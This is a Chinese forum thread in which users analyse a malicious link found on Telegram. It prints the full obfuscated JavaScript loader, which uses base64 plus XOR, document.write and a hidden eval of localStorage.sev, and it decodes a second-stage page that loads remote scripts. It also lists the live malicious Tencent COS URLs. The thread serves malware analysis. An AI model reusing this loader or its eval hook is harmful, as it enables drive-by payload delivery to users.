在 TG 上看到一个恶意链接指向腾讯云 COS,里面放了 2 个链接,分别是: https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748018-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66006&s=49099bbcf6bda5c58ae9ebe761da1aec&t=0810 和 https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748024-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66009&s=f3e1e98b02de5803ea07dcb5b1a2a34e&t=0810 !!!请不要用浏览器点进去!!! 通过 curl 访问(curl 只拿响应、不会执行脚本;要复现请用它或一次性虚拟机,不要用日常浏览器),发现返回的页面里只有一段经过混淆的 js 脚本——并不是真正的加密,只是 base64 加固定密钥异或——如下:
<script>
// Stage-1 loader captured from the Tencent COS links above. Everything it needs
// is embedded: a filler-padded base64 blob (s) and a 32-byte XOR key (p).
// Nothing here is "encrypted" in any meaningful sense -- it is obfuscation to
// get past static scanners. NOTE(review): be4() below carries an
// eval(localStorage.sev) hook, so do not replay this inside a real browser profile.
(function(){
var i=0,t="",s="M yV!QV,g!Zh Qw!R Rf!n B H,O0 8!EW F 1b!U R,I,8 Bl J Q,aF9 eD!w J/Y V!4 5,J gw t L XV 1 BH,p!9T kY 7!b!W,ZZc!XF4C Txs L!EN!iY GAOK l!ZhB,j,kLCF,I!t,X AA o enp3V S h xT AF,Z b,mQV,P2BT,dF!o,Kd 1w,Cbw J Y LwsM!Ey,1w d h B,p bnBI!O2,Z 2,A mF!h Wl!Y pX VJ,MaH,sIB w,J,g ZUU5N,gw,tLX!V!1 BHp!9 T kg!4,Bn 5B W35 n AQ,Y!H,LF N oa!3tYB3Bl,QQ!AYVxAoBF g!Wa,X5 gBg,UHY,l l!afm,QJ KV l fQ1 t BAF8!6!C n la A S,VuHz,1uZ!g9,/V!H,B BA G1Y AFpb eBw p,W S hPWms,IB g B/ Z!V4,HJ W,0QPgRM FW!pU c EEtBwV a dmU,DEg!Rj!UkxZ!VnxeM1J!AQ A!BQ d h!8F b,n ZTY 15,ZV!S!h 2!dVZ,o,fn!g M Bl kKT l!x7c 0,0 AV,XoP K g9 Q V g,B+dhl,8U!A 5EAGI B WmJ!u!X,l U/ YyB KX H,9 WQg,E!LeU w!v,N,X4,M,PQR iEG,l!h!fF!o!Fcm!F,E Y,W FO F,gB,sMEx,hC!3 x!C!OgoOQi!9Rbh E!+ c X,JTaW,o P!XANy!DV!h h YUEQ A!V ow!VX RVf0Y AQQJCAjUM!E w,VY eQp,jU0FEAg!d 6SF l!u d F Y1,Uwl e c X tw U,DN!w e V wAD 1QR,AH V,2U1Zh d,F 4,x,Z n4 B!Ym 5!eV!i!kG F!lFc!V,X!d N!O,gt9!R,g,Aqa Q!8t,fno aak,MG!Ww B 9Z!gFb!fntQ,K U!1fC!m,J,ve!EI6 Cm VD L!w 8!B,ET5,hARN,R,V3 gC,OGJM QnRbW hA,pB!l 9 O!Y m,8ERw FWeQ Y6N,U AV KFtEG,Xp!T,Ag otB,n pbW 1 t aEQFwUn J xe3B,Q!Kn!x,PTDp,R c hYHf mUEV 3F,aRTth B Fh!c!cWB!S AXd!f S!G,F ga,18A Cnl P!Ajp 6V!i!1f d,hl!QVHs L!KF hc,A!V,x+dBw,qX V5P W!W8E XD l gX wU5NX4V AH,F,TF,lE K,e,Eg tYnJ b!YQ!R,g F T!9 sL F,Fcf,2 R!C,Om 9!P,RgY6b h,M,9 B XkW a gsP!Ri!0 G,Y k!Zi!cXB!WP2!d fS,V!pV!Y1!sGew9O LjZ,9HCg FV 1d9fl pa An!Y!BQ!FtP!f0!0 1 d 1 9!D!Y Qt 7RwB,wZh0 g CE8 Q BXF iC!2 l,9,A!nk xcn5,HY n 5,d,T!S!Z!eH kN h,C,3 t HA H B,mH SA,LeQ,Etd X!YOV2 4DW AVyW Eda!X 3!QP K140fG!J,v,f!0E!5,f2FgA Q,9 UD A!YEZg!9!4 c Xg!C A lx!f Vl,1 B WQ!Es d ydecX,twUC,p!wf,V,o H,K!m 4!f Bl92C!G!lueEQ7 cmJnb,V1 a,I,g c!GV!0 5aCg,Rb A,VZ mWTo 6ah,A 9X1!w!ZV3 F!/Qi1!b e,k Z,a cVpWLnc FV3!N rB EM6!YHZ ZOQ,x u E z 0F,Zh!NRCw J!dO!E!x!fV l!1BW Q,E sd,yde cX twUCp7,dl E q I!Xof,P m,5m U lB U,Al!Ur,TG F f cX,V FAS5 3BU51e!1 JQK!E F!1XC8P dgk9,b,n4n UQt,k X!j Bt Z,V,5 1,d V0 T!AX N f bVx!w e0cBVVR ZL,jZ hFi9,l!ARlR,flpYO 
2Z!TRXVfX!V!Em XS,d!ecXtwUC,p7,dl EF,MV!M T BV s NE1,F!Q,U V wr T F9B,d!0F Z A!Sx3 J15 eaV5Q,K n!t2!U,Q!cPfh,8tcX4L,U!AtjA,C9wek!daWGQK!B1 o3X m h rc!1w,5b3l A O,SV!uJAZ,bZ j N!XY W R FB,W,1m cmF,ue,Ao r Xj!d,Wc2 x,C,fCp7!dlEqKm,I,OB1 92CF E!Le1 Ux,ZnZa WgR 4Vw!djME x c e,wR B AH,9,hQy gh X,F!Y+ b!lx Tf w!t,eA gNi Q19,0 d,XcI,B,l kwTl!p /,d105a 1R G!LBVXA,S 1 1d QR,X!V HB LKHJ mW!V x1d18s,cy 8L dn,1j!W zo,K Dl!0 5NG4T,B!W F6 F W l+!Y 10!4W H JLY m J v,V jQ GX0x cf,2d,C!B,3t cA SAL eQEtd XYIU Q!t 7RwUGfkF ccWMJP 3 M,gCX,N,s Qnwqe3 Z,R!K iVq,E D1P!A Ql,Rf,g9!I O2 ZT!Q X!dBWV4!p B yhTW1 V!dQ A,d,8A 3!0z I!QEP!B gR,m V,mN e!WQo!tB,1w BWm!F!B T!Q== ",
// o/q/w/f are dead at this scope: be4() declares its own copies and the outer
// code never reads them.
o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode,
// Repeating 32-byte XOR key; the loop below indexes it with i%32.
p="cb8fd64c3962a541866fe4f98817c876";
// 1) Strip the junk characters (space, ',' and '!') sprinkled into the base64.
s=s.replace(/[^A-Za-z0-9+/=]/g,"");
// 2) First base64 decode.
s=be4(s);
// 3) XOR every character with the repeating key.
for(i=0;i<s.length;i++)t+=String.fromCharCode(s.charCodeAt(i)^p.charCodeAt(i%32));
// 4) Second base64 decode, then the result (the HTML document quoted further
//    down in this thread) is written straight into the page.
document.write(be4(t));
// Hand-rolled base64 + UTF-8 decoder instead of atob() -- presumably for
// compatibility or to avoid hooks on atob; called twice per page load.
function be4(s){
var c,d,e,h,j,n,r,i=0,v="",t="",l="",m="",o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode;
// Build the alphabet A-Z a-z 0-9 + / = ; '=' lands at index 64 and is used as
// the padding sentinel below. `k` is never declared -> implicit global (sloppy mode).
for(k=0;k<26;k++){m+=f(65+k);l+=f(97+k)}for(k=0;k<10;k++)l+=k;l=m+l+"+/=";
// Side-loading hook unrelated to decoding: whatever is stored under
// localStorage.sev (by an earlier visit or another same-origin page) is eval'd
// here, before the payload is decoded. In a fresh profile it is a no-op; when
// replaying in plain Node there is normally no localStorage global, so this
// line throws a ReferenceError unless you stub localStorage = {}.
if(localStorage.sev){eval(localStorage.sev)}
// Base64: 4 sextets -> 3 bytes; output bytes whose sextet was '=' (64) are skipped.
while(i<s.length){c=l[o](s[q](i++));d=l[o](s[q](i++));e=l[o](s[q](i++));h=l[o](s[q](i++));j=(c<<2)|(d>>4);n=((d&15)<<4)|(e>>2);r=((e&3)<<6)|h;v+=f(j);if(e!=64){v+=f(n)}if(h!=64){v+=f(r)}}
// UTF-8: only 1-, 2- and 3-byte sequences are handled; a 4-byte lead byte
// (>= 240) falls into the 3-byte branch and decodes wrongly. Harmless for this
// payload, but worth knowing if you reuse the decoder for other samples.
c=d=i=0;while(i<v.length){c=v[w](i);if(c<128){t+=f(c);i++}else if(c>191&&c<224){d=v[w](i+1);t+=f(((c&31)<<6)|(d&63));i+=2}else{d=v[w](i+1);e=v[w](i+2);t+=f(((c&15)<<12)|((d&63)<<6)|(e&63));i+=3}}
return t}
})();
</script>这个是什么 0day 吗,有无大佬解析一下这个代码的作用是什么
lll5758 2023-12-22 15:54:18 +08:00
解析完后的代码
<html lang="zh-cn"> <head> <meta charset="utf-8"> <title>Loading... Please wait...</title> <script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-acc 屏蔽地址防止误点 elerate.aliyuncs.com/update/global/md5.min.js"></script> <script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accel 屏蔽地址防止误点 erate.aliyuncs.com/update/global/vue.cjs.min.js"></script> <script type="text/javascript" src="ht 屏蔽地址防止误点 tps://web.cdn.openins 屏蔽地址防止误点 tall.io/openinstall.js"></script> <script type="text/javascript" src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accelerate.aliyu 屏蔽地址防止误点 ncs.com/update/index/1113/w84iap.js"></script> </head> <body> <script> function b64DecodeUnicode(str) { return decodeURIComponent(atob(str).split('').map(function(c) { return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2); }).join('')); } var base64Content = decodeAndOutputBase64(); var doc = document.open('text/html', 'replace'); var dat = b64DecodeUnicode(base64Content); doc.write(dat); doc.close(); </script> </body> </html> 注意这只是第二层加载器:页面先从一个阿里云 OSS bucket(indexwealth)拉 md5.min.js、vue.cjs.min.js 和 w84iap.js,再从 web.cdn.openinstall.io 拉 openinstall.js,然后调用 decodeAndOutputBase64()——这个函数并没有在页面内定义,只能来自外链脚本(推测是 w84iap.js)——把它返回的 base64 解码后用 document.open/write 整页替换。所以真正的落地内容要看 w84iap.js 吐出的那段 base64,以及 openinstall.js 是否、向哪里发请求;单看这一层还看不出"安装了什么"。
cslive 2023-12-22 17:16:04 +08:00
InDom 2023-12-22 17:28:04 +08:00 2
代码写得花里胡哨,核心就是把一段代码 base64 以后,逐字符与一个固定的 32 字节密钥循环异或(p="cb8fd64c3962a541866fe4f98817c876",按 i%32 取位)——这是简单的异或混淆,并不是凯撒密码那种移位,更谈不上加密。
然后把异或后的结果再 base64 一次,随机插入特殊符号(空格、,、!)当填充就好了,脚本开头的 replace(/[^A-Za-z0-9+/=]/g,"") 会把它们剔掉。 还原也很简单:把 document.write 替换为 console.log,在 node 或一次性沙箱里跑就行——别在日常浏览器里直接执行,be4 里还藏着一句 if(localStorage.sev){eval(localStorage.sev)};在 node 里要先 stub 一个 localStorage={},否则这句会报 ReferenceError。他甚至没有使用 atob,可能是为了兼容性。
blankmiss 2023-12-22 22:42:02 +08:00
刷它 oss 让他不做好事(更稳妥的做法是向腾讯云、阿里云的滥用举报渠道投诉,让这两个 bucket 下架;主动刷流量本身可能涉及法律风险)